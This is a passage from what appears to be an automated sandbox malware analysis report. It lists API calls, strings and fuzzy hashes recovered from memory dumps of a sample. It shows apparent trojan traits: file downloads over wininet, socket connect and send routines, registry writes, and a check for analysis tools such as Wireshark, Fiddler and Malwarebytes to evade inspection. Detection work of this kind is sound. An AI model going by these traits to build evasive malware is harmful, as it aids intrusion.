                                                                                                                              • Part of subcall function 03633CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03638D48
                                                                                                                              • Part of subcall function 03633CF1: _free.LIBCMT ref: 03638D4B
                                                                                                                              • Part of subcall function 03633CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03638D72
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0363403E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0363404B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03634058
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03634065
                                                                                                                            • TlsAlloc.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340B5
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340D0
                                                                                                                            • __init_pointers.LIBCMT ref: 036340DA
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340EB
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340F8
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634105
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634112
                                                                                                                            • DecodePointer.KERNEL32(Function_00013E75,?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634133
                                                                                                                            • __calloc_crt.LIBCMT ref: 03634148
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634162
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03634174
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 3413e81f04353fa4050b68271cb9dbaee19bfcd6cc853ca211209ad9361f650e
                                                                                                                            • Instruction ID: 0af42d64a5a65cbc0eb9436d8ee3f3609e338eb856a1926c9c3035cb2c931c6a
                                                                                                                            • Opcode Fuzzy Hash: 3413e81f04353fa4050b68271cb9dbaee19bfcd6cc853ca211209ad9361f650e
                                                                                                                            • Instruction Fuzzy Hash: BB3152B9E50314AEDB51FF76AA0865ABEA4EB467A0F24652AE810C335CEB30D051DF44
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                            • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                            • API String ID: 3970221696-33419044
                                                                                                                            • Opcode ID: 2eae2040571283f4b023cb50dff4ac4a0910d690ca502cf26155ebd758020fc3
                                                                                                                            • Instruction ID: 7ecbbd50257b01ef7e3a193c93c3fa487a847f7bf45f84391cb72bb549a2e968
                                                                                                                            • Opcode Fuzzy Hash: 2eae2040571283f4b023cb50dff4ac4a0910d690ca502cf26155ebd758020fc3
                                                                                                                            • Instruction Fuzzy Hash: 5C51EDB5E407287ADB20EB60CD49FEF7778DF55700F004599A70AAA180EBB1D684CFA5
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(wininet.dll), ref: 03627CC3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03627CD7
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 03627CF7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03627D16
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03627D53
                                                                                                                            • _memset.LIBCMT ref: 03627D7E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03627D8C
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03627DDB
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627DF9
                                                                                                                            • Sleep.KERNEL32(00000001), ref: 03627E01
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03627E0D
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 03627E28
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                            • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                            • API String ID: 1463273941-1099148085
                                                                                                                            • Opcode ID: 0164292331e4a676dd3402889ff7d2d4fa5f07e0a1062103d6316ed13daf3a5d
                                                                                                                            • Instruction ID: 7e5f92a897c9f7bb9dd598b106f059e61c809f1aef94a68b04f1e6072654d881
                                                                                                                            • Opcode Fuzzy Hash: 0164292331e4a676dd3402889ff7d2d4fa5f07e0a1062103d6316ed13daf3a5d
                                                                                                                            • Instruction Fuzzy Hash: E841E375A4022CABD720EB648C41FEEB7F8BF45700F15C5A9F648A6280CEB05A458FE4
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0362455A
                                                                                                                            • timeGetTime.WINMM ref: 0362457B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362459B
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 036245BD
                                                                                                                            • SwitchToThread.KERNEL32 ref: 036245D7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03624620
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03624644
                                                                                                                            • send.WS2_32(?,036449C0,00000010,00000000), ref: 03624668
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03624686
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03624691
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 0362469F
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 036246B3
                                                                                                                            • closesocket.WS2_32(?), ref: 036246BD
                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 036246F6
                                                                                                                            • SetLastError.KERNEL32(000005B4), ref: 0362470A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362472B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03624743
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1692523546-0
                                                                                                                            • Opcode ID: f8c91582c3b1b4c3faaf4d2fa78b97acc60f92782bcc9986e179825ba5fd4033
                                                                                                                            • Instruction ID: b9172914b350dc79ff31928b4ea23da44ae324adb4803456bd411b12da98fd4e
                                                                                                                            • Opcode Fuzzy Hash: f8c91582c3b1b4c3faaf4d2fa78b97acc60f92782bcc9986e179825ba5fd4033
                                                                                                                            • Instruction Fuzzy Hash: 0991CF74600E22AFC726DF26D988B6AFBA5FF44700F158519E5168B648CB31E4A1CFD0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                                                            • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                            • API String ID: 1873853019-591889663
                                                                                                                            • Opcode ID: f4b2dc51d31b03f71f7cf5fa8c1dfcd7c26d199a96fae14d57feaf64e79470dd
                                                                                                                            • Instruction ID: f5868b110668cc0c5c2e4fcac64633bd70054b4acc2127b6f9328907a4772cbe
                                                                                                                            • Opcode Fuzzy Hash: f4b2dc51d31b03f71f7cf5fa8c1dfcd7c26d199a96fae14d57feaf64e79470dd
                                                                                                                            • Instruction Fuzzy Hash: C88126B5A40710AFE710EB54DC86F6B7B64AF05710F0A4068ED195F387EAB1E910CBA6
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 03625CD3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: VisibleWindow
                                                                                                                            • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                            • API String ID: 1208467747-3439171801
                                                                                                                            • Opcode ID: 30687647abda240c792ea9dc3d35839603d065bfb3d3040dcdc553fba53fac36
                                                                                                                            • Instruction ID: 03edbab6245c14bae4b60313fda24a7da565ac08ba5ae59c719c7e475ffe6d38
                                                                                                                            • Opcode Fuzzy Hash: 30687647abda240c792ea9dc3d35839603d065bfb3d3040dcdc553fba53fac36
                                                                                                                            • Instruction Fuzzy Hash: F6418EA6F41B217ADB71F5316E02FDF695C0D23486F09006AEE5BA8305F749921948EF
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C3455A
                                                                                                                            • timeGetTime.WINMM ref: 02C3457B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C3459B
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C345BD
                                                                                                                            • SwitchToThread.KERNEL32 ref: 02C345D7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C34620
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C34644
                                                                                                                            • send.WS2_32(?,02C47440,00000010,00000000), ref: 02C34668
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C34686
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C34691
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 02C3469F
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02C346B3
                                                                                                                            • closesocket.WS2_32(?), ref: 02C346BD
                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02C346F6
                                                                                                                            • SetLastError.KERNEL32(000005B4), ref: 02C3470A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C4FA44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3448239111-0
                                                                                                                            • Opcode ID: d3612e98c2cc9eb1fa591c7f9795f22ecde26448c36fdc776028150ce717336e
                                                                                                                            • Instruction ID: 26dc429d4cfc3b2cd89f46b63a4c91bc6fbee3754b7d04e1bb1ebdd06fba9f99
                                                                                                                            • Opcode Fuzzy Hash: d3612e98c2cc9eb1fa591c7f9795f22ecde26448c36fdc776028150ce717336e
                                                                                                                            • Instruction Fuzzy Hash: 0B510079A40615EFC73ADF64D888BAAB7B5FF84745F404A25E50187A80C770FAA0CBD0
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0362A8C1,?,?), ref: 0362DA43
                                                                                                                            • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0362A8C1,?,?), ref: 0362DA62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: f52d2ad2d8f765ff33e29e2bf8f09986b005f5a617263ff52aaf5853429f6fd5
                                                                                                                            • Instruction ID: 4685bdb6d987e54af2bf88c5850f3a3601255bca6cd12fe779760cbaa47bb546
                                                                                                                            • Opcode Fuzzy Hash: f52d2ad2d8f765ff33e29e2bf8f09986b005f5a617263ff52aaf5853429f6fd5
                                                                                                                            • Instruction Fuzzy Hash: 4C810376B00A149FD720DFA9D984B6ABBE8FB48315F264569F919CB740E7B1E400CF90
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362C63D
                                                                                                                            • _memset.LIBCMT ref: 0362C64C
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0362C66F
                                                                                                                              • Part of subcall function 0362C81E: RegCloseKey.ADVAPI32(80000000,0362C7FA), ref: 0362C82B
                                                                                                                              • Part of subcall function 0362C81E: RegCloseKey.ADVAPI32(00000000), ref: 0362C834
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close_memset$Open
                                                                                                                            • String ID: %08X
                                                                                                                            • API String ID: 4292648718-3773563069
                                                                                                                            • Opcode ID: 8cfccf9e85a6187e14f49561aaa386498d87cfa8dd424d427c33101a43a20485
                                                                                                                            • Instruction ID: 10a539c343198c7370bd843c46c335f7f552b976d531883c5a66eddd0381f067
                                                                                                                            • Opcode Fuzzy Hash: 8cfccf9e85a6187e14f49561aaa386498d87cfa8dd424d427c33101a43a20485
                                                                                                                            • Instruction Fuzzy Hash: 1E516FB6A00618ABDB24EF50CC99FEEBB78EB44704F405599F705AB180D774AB44CFA4
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 02C33710
                                                                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02C33749
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02C33766
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02C33779
                                                                                                                            • WSACreateEvent.WS2_32 ref: 02C3377B
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02C4D990), ref: 02C3378D
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02C4D990), ref: 02C33799
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02C4D990), ref: 02C337B8
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02C4D990), ref: 02C337C4
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 02C337D2
                                                                                                                            • htons.WS2_32(?), ref: 02C337F8
                                                                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 02C33816
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 02C3382B
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02C4D990), ref: 02C3383A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1455939504-0
                                                                                                                            • Opcode ID: 51a33f780997ab5bf0f058aaf7a812f7bc205fd96aeea0c054f999f3fc7f699d
                                                                                                                            • Instruction ID: 5aba3484aed30c5de9c03bb770f652e475d1b46a88df61ed35362824f3850a36
                                                                                                                            • Opcode Fuzzy Hash: 51a33f780997ab5bf0f058aaf7a812f7bc205fd96aeea0c054f999f3fc7f699d
                                                                                                                            • Instruction Fuzzy Hash: 9E4162B5A40244ABE710DFA4DC49F7FB7B8EF99710F504A19F611A72C0C775A904CBA1
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 03623710
                                                                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03623749
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03623766
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03623779
                                                                                                                            • WSACreateEvent.WS2_32 ref: 0362377B
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03651F0C), ref: 0362378D
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03651F0C), ref: 03623799
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03651F0C), ref: 036237B8
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03651F0C), ref: 036237C4
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 036237D2
                                                                                                                            • htons.WS2_32(?), ref: 036237F8
                                                                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 03623816
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 0362382B
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03651F0C), ref: 0362383A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1455939504-0
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(?,95401134), ref: 0362AA58
                                                                                                                            • wsprintfW.USER32 ref: 0362AA8F
                                                                                                                            • _memset.LIBCMT ref: 0362AAA7
                                                                                                                            • _memset.LIBCMT ref: 0362AABA
                                                                                                                              • Part of subcall function 03628020: lstrlenW.KERNEL32(?), ref: 03628038
                                                                                                                              • Part of subcall function 03628020: _memset.LIBCMT ref: 03628042
                                                                                                                              • Part of subcall function 03628020: lstrlenW.KERNEL32(?), ref: 0362804B
                                                                                                                              • Part of subcall function 03628020: lstrlenW.KERNEL32(?), ref: 03628056
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0362ABBE
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0362AC6E
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362ACAA
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                              • Part of subcall function 03629730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,95401134,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E,00000000), ref: 03629773
                                                                                                                              • Part of subcall function 03629730: InitializeCriticalSectionAndSpinCount.KERNEL32(0362E1AE,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629812
                                                                                                                              • Part of subcall function 03629730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629850
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                            • API String ID: 1254190970-1225219777
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0362C889
                                                                                                                            • RegDeleteValueW.ADVAPI32(?), ref: 0362C894
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362C8A4
                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0362C8C3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0362C8D1
                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0362C8E4
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0362C8F2
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362C900
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                            • String ID: AppEvents$Network
                                                                                                                            • API String ID: 3935456190-3733486940
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1873853019-0
                                                                                                                            APIs
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,9426D0E6), ref: 02C35A65
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C35B04
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35B42
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35B67
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C35C5F
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C35C80
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35B8C
                                                                                                                              • Part of subcall function 02C31280: __CxxThrowException@8.LIBCMT ref: 02C31290
                                                                                                                              • Part of subcall function 02C31280: DeleteCriticalSection.KERNEL32(00000000,?,02C47E78), ref: 02C312A1
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C35CF1
                                                                                                                            • timeGetTime.WINMM ref: 02C35CF7
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C35D0B
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35D14
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                            • String ID:
